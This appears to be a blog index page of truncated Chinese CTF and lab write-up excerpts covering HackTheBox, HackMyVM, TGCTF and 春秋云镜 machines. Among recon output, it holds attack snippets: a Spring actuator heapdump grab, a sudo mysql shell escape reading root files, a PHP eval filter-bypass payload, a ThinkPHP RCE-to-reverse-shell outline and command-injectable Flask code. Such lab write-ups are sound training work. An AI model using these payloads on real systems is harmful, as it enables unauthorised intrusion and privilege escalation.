春秋云镜-Hospital
描述:在这个场景中,你将扮演一名渗透测试工程师,被派遣去测试某家医院的网络安全性。你的目标是成功获取所有服务器的权限,以评估公司的网络安全状况。该靶场共有 4 个 flag,分布于不同的靶机。
标签:内网渗透、Nacos、Shiro、Fastjson、Decrypt
难度:简单
内网地址
Host or FQDN
简要描述
172.30.12.5
Web01
Spring + Shiro
172.30.12.6
Server02
Nacos
172.30.12.236 172.30.54.179
Web03
Fastjson
172.30.54.12
Web04
Grafana + Postgresql
flag1 入口-172.30.12.5fscan起手
1http://39.99.147.102/actuator/heapdump
下载到heapdump文件
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515 ...
春秋云镜-Initial
信息搜集
thinkphp 5.0.23 RCE检测一下
写马
反弹shell
得到第一半flag
123456789101112131415www-data@ubuntu-web01:/$ sudo mysql -e '\! cat /root/flag/f*'sudo mysql -e '\! cat /root/flag/f*' ██ ██ ██ ██ ███████ ███████ ██ ████ ██ ████████ ░░██ ██ ░██ ████ ██░░░░░██ ░██░░░░██ ████ ░██░██ ░██ ██░░░░░░██ ░░██ ██ ░██ ██░░██ ██ ░░██░██ ░██ ██░░██ ░██░░██ ░██ ██ ░░ ░░███ ░██ ██ ░░██ ░██ ░██░███████ ██ ░░██ ░██ ░░██ ...
TGCTF_web
AAA偷渡阴平
web签到1。简单的PHP特性,我的waf无懈可击!(bushi
1234567891011121314<?php$tgctf2025=$_GET['tgctf2025'];if(!preg_match("/0|1|[3-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $tgctf2025)){ //hint:你可以对着键盘一个一个看,然后在没过滤的符号上用记号笔画一下(bushi eval($tgctf2025);}else{ die('(╯‵□′)╯炸弹!•••*~●');}highlight_file(__FILE__);
考虑无参
?tgctf2025=eval(current(getallheaders()));
或者
...
HMVM-SingDanceRap
端口扫描
目录扫描12345678910111213141516171819202122232425262728293031323334┌──(root㉿kali)-[~/yiyi/vshell_4.9.3/v_linux_amd64]└─# feroxbuster -u http://192.168.56.123/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --extensions php,html,js,txt ...
HMVM-Todd
12345678910┌──(root㉿kali)-[~]└─# arp-scan -I eth2 -l Interface: eth2, type: EN10MB, MAC: 00:0c:29:26:ba:7d, IPv4: 192.168.56.121Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)192.168.56.1 0a:00:27:00:00:15 (Unknown: locally administered)192.168.56.100 08:00:27:86:23:49 PCS Systemtechnik GmbH192.168.56.120 08:00:27:28:80:f3 PCS Systemtechnik GmbH3 packets received by filter, 0 packets dropped by kernelEnding arp-scan 1.10.0: 256 hosts sc ...
环境变量注入执行任意命令
在nss上做NCTF 2022的时候发现一道很有意思的题
遂记下
源程序如下
123456789101112131415161718192021222324252627@app.route("/calc", methods=['GET'])def calc(): ip = request.remote_addr num = request.values.get("num") log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S", time.localtime()), ip,num) if waf(num): try: data = eval(num) os.system(log) except: pass ...
HTB-EscapeTwo
As is common in real life Windows pentests, you will start this box with credentials for the following account: rose / KxEPkKe6R8su
HTB-Dog
扫目录扫到git泄露 githacker开扒
在files目录发现了应该是别的师傅写的马,还是不直接用了吧
robots.txt
12345678910111213141516171819202122232425262728293031323334353637383940414243444546## robots.txt## This file is to prevent the crawling and indexing of certain parts# of your site by web crawlers and spiders run by sites like Yahoo!# and Google. By telling these "robots" where not to go on your site,# you save bandwidth and server resources.## This file will be ignored unless it is at the root of your host:# Used: ht ...
HTB-Cypher
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596E:\小工具\ONE-FOX集成工具箱_V8公开版_by狐狸\gui_scan\dirsearch>python dirsearch.py -u http://cypher.htb/ _|. _ _ _ _ _ _|_ v0.4.3 by 鹏组安全 (_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11714Output File: E:\小工具\ONE-FOX集成工具箱_V8公开版_by狐狸\gui_scan\dirsearch\repor ...
HTB-UnderPass
fscan只扫出22 80 110端口
学到一个新的信息搜集的新招
snmpwalk 命令从目标主机 underpass.htb 获取的管理信息库 (MIB) 数据
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950┌──(root㉿kali)-[~]└─# snmpwalk -v1 -c public underpass.htbCreated directory: /var/lib/snmp/cert_indexesiso.3.6.1.2.1.1.1.0 = STRING: "Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64"iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10iso.3.6.1.2.1.1.3.0 = Timeticks: (11947193) ...